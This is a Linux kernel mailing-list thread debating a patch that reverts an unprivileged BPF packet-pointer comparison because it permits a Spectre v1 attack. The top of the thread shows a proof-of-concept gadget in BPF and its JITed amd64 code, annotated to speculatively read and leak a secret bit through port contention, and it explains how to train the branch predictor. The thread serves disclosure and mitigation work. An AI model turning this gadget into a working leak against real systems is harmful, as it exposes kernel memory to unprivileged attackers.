r2 = *(u32 *)(r1 + 76) // data r3 = *(u32 *)(r1 + 80) // data_end r4 = r2 r4 += 1 if r4 > r3 goto exit r5 = *(u8 *)(r2 + 0) // speculatively read secret r5 &= 1 // choose bit to leak // ... side channel to leak secret bit exit: // ...
This is jited to the following amd64 code which still contains the gadget:
0: endbr64 4: nopl 0x0(%rax,%rax,1) 9: xchg %ax,%ax b: push %rbp c: mov %rsp,%rbp f: endbr64 13: push %rbx 14: mov 0xc8(%rdi),%rsi // data 1b: mov 0x50(%rdi),%rdx // data_end 1f: mov %rsi,%rcx 22: add $0x1,%rcx 26: cmp %rdx,%rcx 29: ja 0x000000000000003f // branch to mispredict 2b: movzbq 0x0(%rsi),%r8 // speculative load of secret 30: and $0x1,%r8 // choose bit to leak 34: xor %ebx,%ebx 36: cmp %rbx,%r8 39: je 0x000000000000003f // branch based on secret 3b: imul $0x61,%r8,%r8 // leak using port contention side channel 3f: xor %eax,%eax 41: pop %rbx 42: leaveq 43: retq
Here I'm using a port contention side channel because storing the secret to the stack causes the verifier to insert an lfence for unrelated reasons (SSB mitigation) which would terminate the speculation.
As Daniel already pointed out to me, data_end is even attacker controlled as one could send many packets of sufficient length to train the branch prediction into assuming data_end >= data will never be true. When the attacker then sends a packet with insufficient data, the Spectre v1 gadget leaks the chosen bit of some value that lies behind data_end.
To make it clear that the problem is not the pointer comparison but the missing masking instruction, it can be useful to transform the code above into the following equivalent pseudocode:
r2 = data r3 = data_end r6 = ... // index to access, constant does not help r7 = data_end - data // only known at runtime, could be [0,PKT_MAX) if !(r6 < r7) goto exit // no masking of index in r6 happens r2 += r6 // addr. to access r5 = *(u8 *)(r2 + 0) // speculatively read secret // ... leak secret as above
One idea to resolve this while still allowing for unprivileged packet access would be to always allocate a power of 2 for the packet data and then also pass the respective index mask in the skb structure. The verifier would then have to check that this index mask is always applied to the offset before a packet pointer is dereferenced. This patch does not implement this extension, but only reverts [3].
Hi Luis,
The skb pointer comparison is a reasonable operation in a networking bpf prog. If we just prohibit a reasonable operation to prevent a possible spectre v1 attack, it looks a little weird, right ? Should we figure out a real fix to prevent it ?
I see your point, but this has been the case since Spectre v1 was mitigated for BPF. I actually did a few statistics on that in [1] and
50 out of ~350 programs are rejected because of the Spectre v1
mitigations. However, to repeat: The operation is not completely prohibited, only prohibited without CAP_PERFMON.
Maybe it would be possible to expose the allow_ptr_leaks/bpf_spec_vX flags in sysfs? It would be helpful for debugging, and you could set it to 1 permanently for your purposes. However, I'm not sure if the others would like that...
I really appreciate that idea. I actually shared a similar concept earlier.[1]. Nonetheless, I believe it would be prudent to align with the system settings regarding CPU security mitigations within the BPF subsystem as well. In our production environment, we consistently configure it with "mitigations=off"[2] to enhance performance, essentially deactivating all optional CPU mitigations. Consequently, if we implement a system-wide "mitigations=off" setting, it should also inherently bypass Spectre v1 and Spectre v4 in the BPF subsystem.
Alexei, Daniel, any comments ?
Yes, I think that would be acceptable as a global override. At least I don't see it would make anything worse if the rest of the system has mitigations disabled anyway.
[1]. https://lore.kernel.org/bpf/CALOAHbDDT=paFEdTb1Jsqu7eGkFXAh6A+f21VTrMdAeq5F6... [2]. https://www.kernel.org/doc/html/latest/admin-guide/kernel-parameters.html
Another solution I have been working on in [2] is to change the mitigations to insert an lfence instead of rejecting the program entirely. That would have bad performance, but would still be better than completely rejecting the program. However, these patches are far from going upstream currently.
A detail: The patches in [2] currently do not support the case we are discussing here, they only insert fences when the speculative paths fail to verify.
[1] https://sys.cs.fau.de/extern/person/gerhorst/23-03_fgbs-spring-2023-presenta...
- Slide 9
[2] https://gitlab.cs.fau.de/un65esoq/linux/-/commits/v6.5-rc6-bpf-spectre-nospe...
-- Luis
-- Regards Yafang
linux-kselftest-mirror@lists.linaro.org